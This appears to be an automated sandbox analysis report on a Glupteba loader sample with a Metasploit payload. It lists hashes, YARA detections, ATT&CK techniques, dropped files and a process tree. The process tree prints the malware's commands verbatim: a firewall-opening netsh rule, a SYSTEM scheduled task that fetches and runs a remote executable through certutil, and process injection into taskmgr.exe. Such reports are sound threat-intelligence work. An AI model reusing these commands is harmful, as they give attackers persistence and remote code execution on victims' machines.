glupteba | 7159e4ff1500b6f091105907e3aebbb27758c966231e4be0cbb0c85832b4f0e6

Analysis

max time kernel
10s
max time network
159s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
13-01-2024 02:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

57b10105a6def31c74e6b5bd1182de81.exe
Size

4.4MB
MD5

57b10105a6def31c74e6b5bd1182de81
SHA1

18ad0688033fe360b90a96f5374ef4414c2e4f32
SHA256

7159e4ff1500b6f091105907e3aebbb27758c966231e4be0cbb0c85832b4f0e6
SHA512

98da377b01c4fbcf9cf09f2df7710224848e2f57966894459dba18fa10c522c593709ba0e61830bd23cdb952f3678a0598861073ca40a340f3bd235dd064c34d
SSDEEP

98304:Lg3aFLu687Bg/hl/Qcl3sCGCPWbi8+/7NkKpFWBsE:3lul7Bg5l/QerPEA/RkUWj

Score

10^/10

glupteba metasploit backdoor dropper evasion loader trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 16 IoCs

resource	yara_rule
behavioral1/memory/3032-2-0x0000000004E60000-0x0000000005786000-memory.dmp	family_glupteba
behavioral1/memory/3032-3-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/3032-5-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/3032-6-0x0000000004E60000-0x0000000005786000-memory.dmp	family_glupteba
behavioral1/memory/2996-9-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/2996-19-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/2928-21-0x00000000050B0000-0x00000000059D6000-memory.dmp	family_glupteba
behavioral1/memory/2928-23-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/2928-242-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/2928-244-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/2928-245-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/2928-246-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/2928-247-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/2928-248-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/2928-249-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba
behavioral1/memory/2928-250-0x0000000000400000-0x00000000030EF000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
2572	netsh.exe

Modifies boot configuration data using bcdedit 1 IoCs

pid	Process
1556	bcdedit.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2780	schtasks.exe
2564	schtasks.exe

GoLang User-Agent 4 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	40	Go-http-client/1.1
HTTP User-Agent header	29	Go-http-client/1.1
HTTP User-Agent header	30	Go-http-client/1.1
HTTP User-Agent header	37	Go-http-client/1.1

C:\Users\Admin\AppData\Local\Temp\57b10105a6def31c74e6b5bd1182de81.exe
"C:\Users\Admin\AppData\Local\Temp\57b10105a6def31c74e6b5bd1182de81.exe"
1⤵
PID:3032
- C:\Users\Admin\AppData\Local\Temp\57b10105a6def31c74e6b5bd1182de81.exe
  "C:\Users\Admin\AppData\Local\Temp\57b10105a6def31c74e6b5bd1182de81.exe"
  2⤵
  PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    PID:2660
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:2572
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe /104-104
    3⤵
    PID:2928
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:2780
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:2564
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      PID:1944
  - - C:\Windows\system32\bcdedit.exe
      C:\Windows\Sysnative\bcdedit.exe /v
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1556
  - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
      4⤵
      PID:1260

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240113020023.log C:\Windows\Logs\CBS\CbsPersist_20240113020023.cab
1⤵
PID:2628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
70KB

MD5
0236ca63ac82e101895f5e22b1623ed3

SHA1
c291ad070963362113aad09697ff5a218811a737

SHA256
795499a28c370066ac9fbc7eb2cf7e6621b6f68a1b1d0ee120de4c17ada20f86

SHA512
3cdbe5bed0ae9613aecba25a2a0013cee5c9b14af5f508068252dbc684932bb5faf348adb51aea4159ac57e9a3b1f4129cb4919620a0115c094a0ea0d4b879b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
102KB

MD5
3464e08a21f4919a12ddb2aaaa4e59c0

SHA1
e5bc3286817095d004f8cc7bbf98617675327e3b

SHA256
0ef0f8cb3f2599aefe1f14bcefd5354a18780ed5fc85d619fe72566d5161aa5a

SHA512
a886d95c2c5246a37cb60e22c56b51cde18c269edd0a519a51d41e12efcb59fd0d7fa722cc61d60e2bad5ad5b4ccaa42a8914fb7dc25d39e9011cadd6f66a853

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
70KB

MD5
18f7e0792d1e4b7d967d05cd5898ec71

SHA1
b2cf54ca50fd9b294fc280e548e75180031b2073

SHA256
a441839eb229bdf943ee2cfbf58061e611496b001b84a2b30403a10e9a85c228

SHA512
b603385e1e1b1ff1973dcde62381f010d1991d90f1abe7dc2ed485f1df491068c48792a3cc43babfa4b2ce2f853896de4808ec05cae59473d273989ad0b8a076

Download Submit
C:\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
57KB

MD5
9e05b5dfc4f387760565cdb00e0a0689

SHA1
0fc1f155fab40f43e7f1f9e689b48a320b2ff6b0

SHA256
f5ba525abfecd10b1f29b1baa35cbb53fb37981d54753696b46e1f135dd21a18

SHA512
9f91031223716a52039936dde2739aa0e184c6ccad2f52108171dd9cda68a8de9f538aa15ce878d25e9f88df232660d3476005abe810cdbacdfc0dae1d96099f

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a102978c7e5db61f5c63c91b7e9f6f27

SHA1
3674634afc5f16320dfb8486142464461b8164e6

SHA256
8db7db3413f392d545f71321b33809d855020e6f983bd8caacc92b85e3c0a843

SHA512
61670f37c4322b18bbc29e6569580a307f70b75ae992d4e2b5cc000ad995ebae1b381c5ad5cded68c67b1e716809ade03f833aea704741d737fefed60e61c0f1

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8b2f642787180177c2b5ad3515634b86

SHA1
77c1a443d9af7e3104fb7dcdbf1417caca0c35f5

SHA256
6ffb2f43b4194620d6dfd4caf8cc2e84bffb6eb217d2a269f888fe7bcd454ff1

SHA512
8e4ebd9fcf542961e7a51e3030ea24abca102ca8279271cc4692a80a72a83bab9f624b5a1e59d4da04e26ab8fba685abca06e5f5bd8f96b4b03c5c5ce799e86a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
18e1f9fb63d220286fa6a65f391cdbdc

SHA1
01ecf5f5b64ed6fa286459a406022eb57d7b3ef2

SHA256
fc99cf33a998082522271d5717efef6d2e89b5f4713f65a29d7c5f632a03f906

SHA512
b6f2fb229fc6c125e0999d58a23c17ab564b615923b467ca0a6750b19f803ddc7a9f7a6f4e4fdcc1086336b412d9611801c9600d90503601ba16835f0def0d4d

Download Submit
C:\Windows\Temp\CabA17D.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Windows\Temp\TarA42E.tmp

Filesize
141KB

MD5
cc64f5b4022c271f18680febea625b7f

SHA1
a8950bfe6cb8a9cab0c3afe5935f4abd5ddf30ad

SHA256
6ba08c923d33ab99500893ac871033a6424df44908e61989a22bae8a69bbd524

SHA512
8fd8cfcc347c314225192a3c932599b46a5fdf3b5970d5da6b70e255f128ecaa0bb568f566cb155d759df7dfbaf1d089324641f0249f0642c95b7e487b294172

Download Submit
C:\Windows\rss\csrss.exe

Filesize
247KB

MD5
48388daffb15533387f64c4f74a6e789

SHA1
d8d2c5056e5c4b0410dc59e65e9ea057ec2c9bf0

SHA256
227892e48f97503d3d208d3cd0a813daa573a69d4ad5f768aa69f3d35b6f9039

SHA512
4d95b9b3040ad38157fb78fa39d2fedcd463d7071c3696c5e749e4a0909bee8a292bdd6c53f320ea9ce47258af2cf538a6a3a4c14e8724f30da56c5a593ad6db

Download Submit
C:\Windows\rss\csrss.exe

Filesize
166KB

MD5
348896caaa87148c96650065a5e703e6

SHA1
738f43de660ba3e3f6971574da32c8ca12f2afdd

SHA256
c4bff3cbe8481dbcc83f4ea2e9e8ec614e0c4a348841a1b14c1f7e5757143282

SHA512
9fa717218755923c735c81c7acbbc3ee6741e5205e0e50116f307afd268f9c128c51177987a61217f1c0caa0606fafbe6e182512671234e565d83e0a5fad422e

Download Submit
C:\Windows\rss\csrss.exe

Filesize
154KB

MD5
03911f4456d65ff1ad25112fe708b8ca

SHA1
0b7bdcc14d8944cf6f4ebc45a288bc4c575e8b98

SHA256
e0540e46f7b50ef7d904cc284a705a414738b8975db9308e31ab8f02a22f3cfd

SHA512
cda5e6c06d7cc23804eea56fa6251d3fba2b3059211e9258c2aff0d3b6df18334b1971fbddda12f48546f948399312a0fa76e0652e0e66b074b82aba5f0446e4

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
157KB

MD5
b158f44218a70f36b05f8c234e791a1e

SHA1
1ed3c73a81b96545da7966f014ccc836a89b20e9

SHA256
4442a24d3071f1463fe907caae4ac975d1c06568fcd9e2d4e74e47063312c707

SHA512
926ab5be8f1d3dde02c377c15545cf9cc2d92840f90216f74c7bf364b4ca3841dfadf7a310213f69a9d20abeaadfcdb87d5db613c34e0a594e7e016b9d514b9b

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
143KB

MD5
948fa4bfd9ec851cf362b608399ef1da

SHA1
d05ebeecdf38ae4183d3d0cd09b13994c02c99c4

SHA256
d52e9741f5586036b76b1f4f0145ebd7e81d1f8afd35af3183fc126e42b62b1f

SHA512
b0d79308ea31fd1bf6e7831c3ffb01369515b4ba03f7ba7e3e2dd9cf2d234ecb6113baf33d4c4463aef0a3fa9c2c633111f716eb89f6058a9b2f200c78a99be7

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll

Filesize
54KB

MD5
828e769dc64f8148a11da614c46a6544

SHA1
01423db281e039ead3ce7dd38967281d2bc3ad1e

SHA256
f0d9c1942503f1ee20e2534bc30f07a9851f92752043dd4e99252a6e35fd65e0

SHA512
aec61868db57fba4b7d98c684b09ef0f417b1d12fae2853d1592527b72c698946c30760569d02beb5aa5376e6910bed0b6ff0152a51bb95f71a240255d725558

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
243KB

MD5
c5a78f0b6f1c9d63e5209b4f2ee476e3

SHA1
e34cf18e78ea488a123c95ae39a4957862c54cdc

SHA256
7fa91251aec4453cf1f51a069c25c855237b38a6841d0685a5e13696878d6edd

SHA512
5433b37f2ff485e3cf9f49c4b2106d0980dfae21480461dd10ba994b3491094b2cdd6b6a0bed55c81eaa61207d12bd9e496d2c0cf2f1524044f609e6020abf71

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
323KB

MD5
f0b8efb8a9a1f05adbe466c0a82ffb87

SHA1
ed1601bc2f7efa4d8212cfd7599c71fd0df21ce3

SHA256
d2596eb1f05dda9843b3865b53fa379305d66445dc97bb5a4a1f216d19423044

SHA512
db1502d9ac1c2dd10bb54768353fd07f41d4f6aa3810f3b27679e792107dd0165924ecdf507397486159029396227a8ad4c43a2a9eae5bcdc4963b7a3b1e5512

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
49KB

MD5
459bec2eb7d9c405408efe30ee5f3429

SHA1
592eb9f51bb4cd145242b02cf18a84159cf5bf96

SHA256
42f72f76f126149c685f7c4adc019ab3e23ee60ecedf92840471abf1586ab741

SHA512
c5771aef5ee13fa0fb52f946d6c70b5a35975947d4c777f9ecddd1b49e5656b4c1d1838b1d2e7bb226810dc2022e68f01419bf7b2497aebe9900292b1cecaaf0

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
72KB

MD5
aa4ec5b49fc4d35e6cbf85a02ee73611

SHA1
c72b5fafe2b020be077289c3e87068957afb5f54

SHA256
8106db4f18596a2c10bf2472b0013e73ee0c77f7b08aa7021279974472d5d9fc

SHA512
a4519e51542c14207919f2810d79e8f15bfefd6b000791d82a1b7ca429004ca54c8315d825d427ca43c456cb8112ed94560b8d69062cd89200d87fab25469235

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
9KB

MD5
a5382ad9f147cfab3ba902e7630b3bbb

SHA1
39366cf19829e8259cea873451db9db23d025210

SHA256
6478b625fe99fc039701b0cce6c2f901ae22cfd6015349e5e456ba11d32e7ca0

SHA512
ec6a23b275b5533e09a273be723fc2262350aeed43d348ecc5ad59e070975662c40d744e2187d7cfe0d7ce20b4595bdc289561ef24a2528e02170287a650cd09

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
40KB

MD5
a603d36d2b06c81f23f18a53bd55ea28

SHA1
e0d1cae3ce67e374c7b14121e738acd83df90897

SHA256
ba2fded42e899e759c2e77229610c4d8fe6d81f371cd10b04246c789dfba1469

SHA512
22c84e89d56073a00e5f1d55950caa7e25ffd44bf6df20da44d6315d3043078849286747fd35861cdc2cdfde2dd38a371dab3bf3a1c5043e83fdd9316575a513

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll

Filesize
63KB

MD5
cb3c7d9f468a97f53f8819c475a9e8d3

SHA1
f32568836fe0b00d59ce11535988475ba1049e5d

SHA256
6c03305f24ad41bd2da4b3ba2b373cf30e2c2f3b4784c591026bbb51362b6aaa

SHA512
7bc0924ba976389d13e9134e028c3037fe454bf5caed231034993d39c5e9987b180e9bca5b6120e0e75324fbe2782a4f7bab1fc5a19d17849de1d4527aea712a

Download Submit
\Windows\rss\csrss.exe

Filesize
256KB

MD5
541e1e4df395d303741affa250f27ab1

SHA1
5d509c073a84dee9782f9d791144b9f1850acf34

SHA256
07065f3608ccfe6cf36992e4c12f40f9e725e588c12648314f431e689b5d5214

SHA512
4ea585a4e80ad16c677dabaead68385ce17c9da9575eedb95bb93f48918a3dd0a1778423197955c3ebb1150a3e3349daa12954fbd31998e2b9747e218227834c

Download Submit
\Windows\rss\csrss.exe

Filesize
248KB

MD5
2d847b00379ae43f8e9c8eb19fc21050

SHA1
8455d8746e8a54736647b256baba076c989c535c

SHA256
6327e05194af804e0122637693d9278f6221e9c0e1a092f1766ba602d3900d53

SHA512
d4f0168f1956b065a62703042c881f35f4eb0dbec4b6ca22172059f078b9153ed2546a5515830d013b2f2314752f64331b5c67f174efc7578aa1721a5f6c46f5

Download Submit
memory/1944-39-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1944-29-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1944-44-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2928-247-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-263-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-248-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-321-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-249-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-18-0x0000000004C70000-0x00000000050AC000-memory.dmp

Filesize
4.2MB

Download
memory/2928-291-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-264-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-242-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-243-0x0000000004C70000-0x00000000050AC000-memory.dmp

Filesize
4.2MB

Download
memory/2928-244-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-250-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-246-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-23-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-20-0x0000000004C70000-0x00000000050AC000-memory.dmp

Filesize
4.2MB

Download
memory/2928-21-0x00000000050B0000-0x00000000059D6000-memory.dmp

Filesize
9.1MB

Download
memory/2928-245-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2928-251-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2996-4-0x0000000004C30000-0x000000000506C000-memory.dmp

Filesize
4.2MB

Download
memory/2996-8-0x0000000004C30000-0x000000000506C000-memory.dmp

Filesize
4.2MB

Download
memory/2996-9-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/2996-19-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/3032-7-0x0000000004A20000-0x0000000004E5C000-memory.dmp

Filesize
4.2MB

Download
memory/3032-6-0x0000000004E60000-0x0000000005786000-memory.dmp

Filesize
9.1MB

Download
memory/3032-5-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/3032-0-0x0000000004A20000-0x0000000004E5C000-memory.dmp

Filesize
4.2MB

Download
memory/3032-3-0x0000000000400000-0x00000000030EF000-memory.dmp

Filesize
44.9MB

Download
memory/3032-2-0x0000000004E60000-0x0000000005786000-memory.dmp

Filesize
9.1MB

Download
memory/3032-1-0x0000000004A20000-0x0000000004E5C000-memory.dmp

Filesize
4.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads